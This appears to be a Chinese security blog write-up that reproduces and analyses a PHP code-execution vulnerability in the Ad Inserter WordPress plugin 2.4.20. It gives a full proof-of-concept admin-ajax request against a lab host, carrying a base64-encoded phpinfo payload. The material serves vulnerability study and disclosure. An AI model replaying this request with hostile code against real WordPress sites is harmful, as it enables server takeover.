0x01 漏洞背景
漏洞編號:
漏洞成因:
0x02 漏洞復現
下載該插件的2.4.20版本並安裝該插件。登陸點擊進入該插件頁面,輸入要執行的php代碼,點擊preview並抓包。
修改數據包中的php參數為1,后台直接執行phpinfo函數,因此我們可以直接執行php代碼。(實際上也不用修改,只需要將右邊的php按鈕變為1即可
poc
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.52.3:8088
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.3:8088/wordpress/wp-admin/options-general.php?page=ad-inserter.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 356
Connection: close
Cookie: wordpress_a9f2205cc9f529d5d6f94cb9c55babef=admin%7C1607100728%7Cx3PimyHstYBeAKq8ITNh7KPYdGhQGZ5bXqcM529v0qu%7Cd1d1dd20b874e69c55a1445c8796b5626a6b27c6f58bed1b9cd85a25717f2015; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a9f2205cc9f529d5d6f94cb9c55babef=admin%7C1607100728%7Cx3PimyHstYBeAKq8ITNh7KPYdGhQGZ5bXqcM529v0qu%7C805e8551ef6c337cb88c047fe6a2b56e54a9e9a1bedd97cb7637aa01af0950cc; wp-settings-time-1=1606994061
Upgrade-Insecure-Requests: 1
action=ai_ajax_backend&preview=1&ai_check=9d4a62730a&name=QmxvY2sgMQ%3D%3D&code=PD9waHAgcGhwaW5mbygpOz8%2B&alignment=MA%3D%3D&horizontal=dW5kZWZpbmVk&vertical=dW5kZWZpbmVk&horizontal_margin=dW5kZWZpbmVk&vertical_margin=dW5kZWZpbmVk&animation=dW5kZWZpbmVk&alignment_css=bWFyZ2luOiA4cHggMDsgY2xlYXI6IGJvdGg7&custom_css=&php=0&label=0&close=undefined&iframe=
0x03 漏洞分析
文章參考漏洞作者的分析,但仍然還沒有理解透(有幾個疑點),目前只能盡力分析,作者講到隨機數nonce字段不安全的問題,但從官方描述中看是由於可以寫任何代碼並執行,因此可以寫一些危險函數如命令執行函數(我覺得還是有點雞肋)
從poc中可以看出該漏洞綁定的是ai_ajax_backend
綁定的hook的函數是ai_ajax_backend
通過check_admin_referer對ai_check進行檢查。(作者提到該函數的隨機數可以從前端獲取,並被利用,在這個地方我沒有復現成功,有點懵)
后面就是當preview為1時,則進入預覽界面,這里將會解析我們的php代碼。
0x04 參考
https://www.wordfence.com/blog/2019/07/critical-vulnerability-patched-in-ad-inserter-plugin/